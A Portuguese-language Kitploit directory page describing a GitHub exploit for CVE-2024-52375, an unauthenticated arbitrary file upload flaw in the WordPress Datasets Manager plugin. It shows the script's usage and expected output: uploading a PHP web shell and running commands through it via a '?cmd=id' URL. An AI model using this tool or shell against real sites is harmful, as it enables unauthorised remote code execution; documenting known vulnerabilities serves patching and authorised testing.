Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-52375 — Plugin WordPress Datasets Manager por Arttia Creative <= 1.5 - Vulnerabilidade de Upload Arbitrário de Arquivo | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-52375
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2024-52375

CVE-2024-52375

Plugin WordPress Datasets Manager por Arttia Creative <= 1.5 - Vulnerabilidade de Upload Arbitrário de Arquivo

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WordPress Datasets Manager <= 1.5 - Upload Arbitrário de Arquivos (CVE-2024-52375)

💥 Exploit por: Nxploit (Khaled Alenazi)
📅 CVE Publicado: 14 de novembro de 2024
🧠 Pontuação CVSS: 10.0 (Crítico)
🛠 CWE-434: Upload sem Restrições de Arquivo com Tipo Perigoso


📌 Descrição

Uma vulnerabilidade crítica foi descoberta no plugin WordPress Datasets Manager by Arttia Creative, afetando todas as versões até 1.5 inclusive.

O plugin não valida corretamente os tipos de arquivo durante o processo de upload, permitindo que um atacante não autenticado envie arquivos arbitrários — incluindo shells PHP — e alcance Execução Remota de Código (RCE).


🧠 Detalhes do CVE

  • ID do CVE: CVE-2024-52375
  • Plugin Afetado: Datasets Manager by Arttia Creative
  • Versões Afetadas: <= 1.5
  • Tipo de Vulnerabilidade: Upload Arbitrário de Arquivos (Não autenticado)
  • CWE: CWE-434 - Upload sem Restrições de Arquivo com Tipo Perigoso
  • CVSS v3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • 🔴 CRÍTICO (10.0)
Severidade:

⚙️ Requisitos

  • Python 3.x
  • Biblioteca requests:
    root@kitploit:~
    pip install requests
    

🚀 Uso

root@kitploit:~

usage: CVE-2024-52375.py [-h] -u URL

Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi

options:
  -h, --help     show this help message and exit
  -u, --url URL  Full target URL (e.g. http://target.com/wordpress)

Substitua a URL pelo caminho completo da instalação WordPress alvo.


✅ Saída Esperada

Se bem-sucedido, o script irá:

  1. Extrair o _wpnonce público do frontend.
  2. Enviar um shell PHP chamado nxploit.php.
  3. Verificar se o shell está acessível e exibir sua URL:
root@kitploit:~
[+] Shell available at:
    http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php

Você pode então executar comandos como:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id

🔒 Notas

  • O exploit verifica automaticamente a versão do plugin via readme.txt.
  • Apenas versões <= 1.5 são vulneráveis.
  • Nenhuma autenticação é necessária.


📢 Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.
Usá-la contra sistemas que você não possui ou sem permissão para testar é ilegal.

Baixar ferramenta